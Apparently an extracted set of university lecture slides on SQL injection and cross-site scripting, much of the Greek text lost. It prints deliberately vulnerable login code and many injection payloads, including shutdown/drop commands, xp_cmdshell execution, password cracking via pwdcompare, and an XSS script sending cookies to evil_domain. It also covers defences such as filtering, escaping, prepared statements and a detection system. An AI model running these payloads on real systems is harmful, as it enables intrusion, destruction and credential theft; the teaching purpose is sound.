SQL Injection (7 November 2016) - icsd.aegean.gr

Monday 7 November 2016
Theodoros Tzouramanis, Assistant Professor
University of the Aegean, Department of Information and Communication Systems Engineering
Database Systems Security
https://www.icsd.aegean.gr/t.tzouramanis/courses/dbs
[email protected]

SQL Injection Attacks

References:
• https://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macpherson
• https://www.veracode.com/blog/2016/04/why-sql-injection-still-around
• J. Clarke: SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012
• P. Russell: Ethical Hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015

Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017

Post on 04-Jun-2018



Firewall

.

‘ ’ firewalls

firewalls - -

, . server databases.


Firewall ( )

server, ( , ports) firewall. firewall , e.g.: web server 80, e-mail SMTP server 25, SQL Server 1433, MySQL server 3306, Oracle Net Listener 1521, .

firewalls: software (e.g. Gauntlet, Firewall-1, Raptor) or hardware (e.g. Cisco Firewall).

Firewall

hackers ‘ ’, .

hackers firewall, e.g. e-mail attachments, - ‘ ’ , cookies, http (e.g.: http://mywebsite/myapp.cgi?acctnum=3), .

.

Firewalls

firewall . ( : secure web ).

web: SQL.

SQL

: hacker web SQL .

: Rain Forest Puppy, 1998.

Jeremiah Grossman: "Rain forest puppy (rfp) is one of the REAL pioneers of the industry who contributed a ton of cutting-edge research that we still use today. You'll also notice that he's a very humble guy who prefers to continue giving back rather than taking the credit he deserves. Welcome back rfp."

SQL ( )

ASP login web:

<%
var txt_username = Request.form("text_username");
var txt_password = Request.form("text_password");
var con = Server.CreateObject("ADODB.Connection");
var rso = Server.CreateObject("ADODB.Recordset");
// vulnerable by design: both form fields are concatenated straight into the SQL text
var str_query = "select * from USERS where username = '" + txt_username + "' and password = '" + txt_password + "';";
// note: the slide never opens con with a connection string; a real page must do so before this call
rso.open(str_query, con);
if (rso.eof) {
    Response.Write("Invalid login.");
} else {
    Response.Write("Welcome to the database!");
}
%>

String sLogin = getParameter("Login");
String sPassword = getParameter("Password");
// vulnerable by design: the request parameters are concatenated into the query text
String query = "SELECT member_id, member_level FROM members WHERE member_login='" + sLogin + "' AND member_password='" + sPassword + "'";
Statement stat = connection.createStatement();
ResultSet rs = stat.executeQuery(query);

SQL ( )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

:
username: ttzouram
password: 45dc&vg3

string sql:
select * from users where username = 'ttzouram' and password = '45dc&vg3';

: Welcome to the database!

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

:
username: ttzou'ram
password: 45dc&vg3

string sql:
select * from users where username = 'ttzou'ram' and password = '45dc&vg3';

:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'ram'
/process_login.asp, line 14

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

hacker:
username: ' or 1=1--
password: anything

string sql:
select * from users where username = '' or 1=1--' and password = 'anything';

: users.

hacker, admin.

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

hacker username:
username: ' or username='ttzouram'--
password: anything

string sql:
select * from users where username = '' or username='ttzouram'--' and password = 'anything';

hacker ttzouram, password .


SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

hacker:
username: ' and 1 in (select @@version)--
password: anything

error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int.
/process_login.asp, line 14

SQL Server Windows! hacker google search server.

SQL ( - )

username: ' UNION SELECT @@version, NULL --
password: anything

:
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

hacker:
username: ' ;SHUTDOWN--
password:

SQL Server.

' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, .

SQL Server

SQL ( - )

ZU 0666', 0, 0); DROP DATABASE TABLICE;--

;

username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108) --

ASCII 108
ASCII 108
;

username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108 WAITFOR DELAY '0:0:5') --

ASCII 108
ASCII 108
;

SQL ( )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

1. hacker:
username: '; create table foo(a int identity(1,1), b varchar(4000)); insert into foo exec master..xp_cmdshell 'dir'--
password:

2. 1, hacker:
username: ' or 1 in (select b from foo where a=1)--
password:

: a = 1, a = 2, a = 3, .

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

3. hacker:
username: '; create table foo2(a int identity(1,1), b varchar(4000)); insert into foo2 exec master..xp_cmdshell 'cmd /c net user'--
password:

4. 5, hacker:
username: ' or 1 in (select b from foo2 where a=1)--
password:

: a = 1, a = 2, a = 3, .

SQL ( - )

var sql = "select * from users where username ='" + username + "' and password = '" + password + "'";

5. hacker:
username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--
password:

: foo.

6. hacker:
username: ttzouram
password: 12345' or 1=1 or '' = '

: Oracle.

SQL Windows Server

M SQL sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod hacker Active Directory IIS Windows Server!

M SQL xp_instance_regaddmultistring, xp_instance_regwrite, xp_instance_regread, xp_regdeletekey, xp_regdeletevalue, xp_regremove, hacker registry Windows Server!

SQL Server SQL

--.

SQL ; . error outputs

SQL Server .

SQL

:
1. web .
2. (log file).

SQL ( )

: 1.
: a. (- ;),

function validate_string( input )
    ' reject input containing any of the known-bad tokens (case-insensitive search)
    known_bad = array( "select", "insert", "update", "delete", "drop", "shutdown", "--", "'" )
    validate_string = true
    for i = lbound( known_bad ) to ubound( known_bad )
        if ( InStr( 1, input, known_bad(i), vbTextCompare ) <> 0 ) then
            validate_string = false
            exit function
        end if
    next
end function

SQL ( )

: 1.
: b. (- ;),

function validate_password( input )
    ' accept only characters from an allow-list; note that the quote character is absent
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[]<>,.?"
    validate_password = true
    for i = 1 to len( input )
        c = mid( input, i, 1 )
        if ( InStr( good_password_chars, c ) = 0 ) then
            validate_password = false
            exit function
        end if
    next
end function

SQL ( )

: 1.
: c. , ‘ ‘:

function escape( input )
    ' double every single quote so it is read as a literal quote inside the SQL string
    input = replace( input, "'", "''" )
    escape = input
end function

SQL ( )

: 1.
: d. , .

username varchar(12) varchar(256), string, .

'; SHUTDOWN;-- varchar(<14)

SQL ( )

( ): 2.

xp_cmdshell, xp_regread, xp_resultset, ( Oracle: utl_file, dbms_lob, dbms_pipe, dbms_output, utl_http, utl_smtp).

SQL ( )

( ): 3.

.

( ) ( ) .

SQL ( )

( ): 4.

, ( server).

.

<?php
// hash both inputs first: an md5 hex digest contains only [0-9a-f],
// so no quote or comment sequence from the input can reach the SQL text
$hashUsername = md5($username);
$hashPassword = md5($password);
$link = mysqli_connect('testserver.com', 'root', '', 'testdb');
$sql_query = "SELECT username FROM users WHERE username = '" . $hashUsername . "' AND password = '" . $hashPassword . "'";
// execute the query
$result = mysqli_query($link, $sql_query);
?>

SQL ( )

( ): 5.

( , e.g. http://goo.gl/JPtms), bug .

SQL

web password .

, hacker:
username: admin'--
password: anything

SQL insert:

insert into users values( 123, 'admin''--', 'anything' )

SQL ( )

password . :

username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
…

SQL ( )

SQL password:

sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"

rso("username") username login.

hacker admin'--, SQL:

update users set password = 'password' where username = 'admin'--'

hacker password admin!

. ’ O’Hara - username .

SQL (log file)

hacker sp_password ( , username: 'admin'-- sp_password) log file:

-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.

Script Passwords Username

script . SQL server. script dict(word varchar(256)) master. passwords .

select name, word as password from dict inner join sysxlogins on (pwdcompare( word, sysxlogins.password, 0 ) = 1)
union select name, password from sysxlogins where (pwdcompare( name, password, 0 ) = 1)
union select name, null from sysxlogins where password is null;

...

web portal ?

SQL injection examination

server
original database
server

... ( )

Prepared statements
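As an added example (not code from the slides), the lecture's login query is run both the way the slides build it, by string concatenation, and as a prepared statement with bound parameters, using the same inputs the slides use (ttzouram, ttzou'ram, ' or 1=1--); sqlite3 stands in for SQL Server, and the users table and its two rows are constructed here.

```python
import sqlite3


def make_db():
    """Constructed sample data (not part of the original slides)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer primary key, username text, password text)")
    con.executemany("insert into users(username, password) values (?, ?)",
                    [("admin", "s3cret"), ("ttzouram", "45dc&vg3")])
    con.commit()
    return con


def login_concat(con, username, password):
    """The slides' pattern: form fields concatenated into the SQL text.
    Returns ("ok", [matched usernames]) or ("error", message)."""
    sql = ("select username from users where username ='" + username +
           "' and password = '" + password + "'")
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.OperationalError as e:
        # a stray quote in the input breaks the statement, as on the ttzou'ram slide
        return ("error", str(e))
    return ("ok", sorted(r[0] for r in rows))


def login_prepared(con, username, password):
    """Hardened form: a prepared statement. The input is only ever bound to
    the two parameters; it never becomes part of the SQL text, so quotes,
    'or 1=1' and '--' are compared as plain characters of the username."""
    sql = "select username from users where username = ? and password = ?"
    rows = con.execute(sql, (username, password)).fetchall()
    return ("ok", sorted(r[0] for r in rows))


if __name__ == "__main__":
    con = make_db()
    for user, pwd in [("ttzouram", "45dc&vg3"),
                      ("ttzou'ram", "45dc&vg3"),
                      ("' or 1=1--", "anything"),
                      ("' or username='ttzouram'--", "anything")]:
        print(repr(user), "concat:", login_concat(con, user, pwd),
              "prepared:", login_prepared(con, user, pwd))
```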


SQL *

.

* K. Kemalis and T. Tzouramanis: "SQL-IDS: A Specification-based Approach for SQL-Injection Detection", In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - Computer Security Track, Fortaleza, Ceara, Brazil, March 2008.

SQL-IDS (SQL-Injection Detection System - SQL )

Java.

SQL-IDS

SQL .

EBNF (Extended Backus–Naur Form).

.: http://savage.net.au/SQL/sql-2003-2.bnf.html

SQL :

SELECT member_id FROM members WHERE (member_login = 'guest' OR member_email = '[email protected]') AND member_password = 'guest';

<Query specification> := SELECT <SELECT List> <FROM Clause> <WHERE Clause>
<SELECT List> := <Table Column> (<COMMA> <Table Column> )
<Table Column> := <IDENTIFIER>
<FROM Clause> := FROM <Table reference>
<Table reference> := <IDENTIFIER>
<WHERE Clause> := WHERE <search condition> AND <search condition>
<search condition> := <Table Column> "=" <STRING_LITERAL>

• : 0 - 20 milliseconds
• : 0,5 milliseconds

: Security AppScan Source Edition, Fortify Source Code Analyzer, CodeSecure, Klocwork Solo .

: Graudit, Yet Another Source Code Analyzer (YASCA), Pixy, AppCodeScan, OWASP LAPSE+ Project, Microsoft Source Code Analyzer for SQL Injection, Microsoft Code Analysis Tool .NET (CAT.NET), RIPS - A Static Source Code Analyzer for Vulnerabilities in PHP Scripts, CodePro AnalytiX, Teachable Static Analysis Workbench

SQL

BSQL ( ):

(Cross Site Scripting Attacks)

XSS

• :
• : .
• : , .
• : , , .
• : , .

Owasp (Open Web Application Security Project) (2007)

XSS

3 :

• (Dom Based): Document Object Model .
• ( ): server.
• ( ): ( . . ) .

• : javascript, , . server.
• : . server .
• : forum. . server ..

( )

• 1: , :
• 2: server ( )
# server
• 3: , .

2. URL
6.
5. server, o URL - , .


( )

• 1: . . link e-mail.
: $_GET $_REQUEST
• 2: O server .
• 3: server server, .

2. URL
6.
5. security context .


( )

• 1: . <
• 2: :
• 3: O server, .

6.
5. .

XSS ;

XSS *

* : " ", , , . , 2008.

forum. : , (posts), , , .

Apache Web Server, mysql-essential, php, phpMyAdmin, Javascript


pop up

<script>document.location ='http://evil_domain/steal.php?cookies=' + document.cookie</script>

GET

site

<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>

Click!

Script inside steal.php:


"refresh" !

<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>


[1] : DOM, javascript, , , .

Noxes [2] HTTP. . • HTTP Referrer .

* . HTTP Referrer , .

:
[1] Vogt P., Nentwich F., Jovanovic N., Kirda E., Kruegel C., Vigna G.: Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis, Proc. Network and Distributed System Security Symposium, San Diego, 2007
[2] Kirda E., Kruegel C., Vigna G., Jovanovic N.: Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks, Proc. 21st Annual ACM Symposium on Applied Computing, France, 2006


XSS

• : server, (security patches), .
• : , .
• : .
• : javascript , , cookies , « ».

SQL XSS - -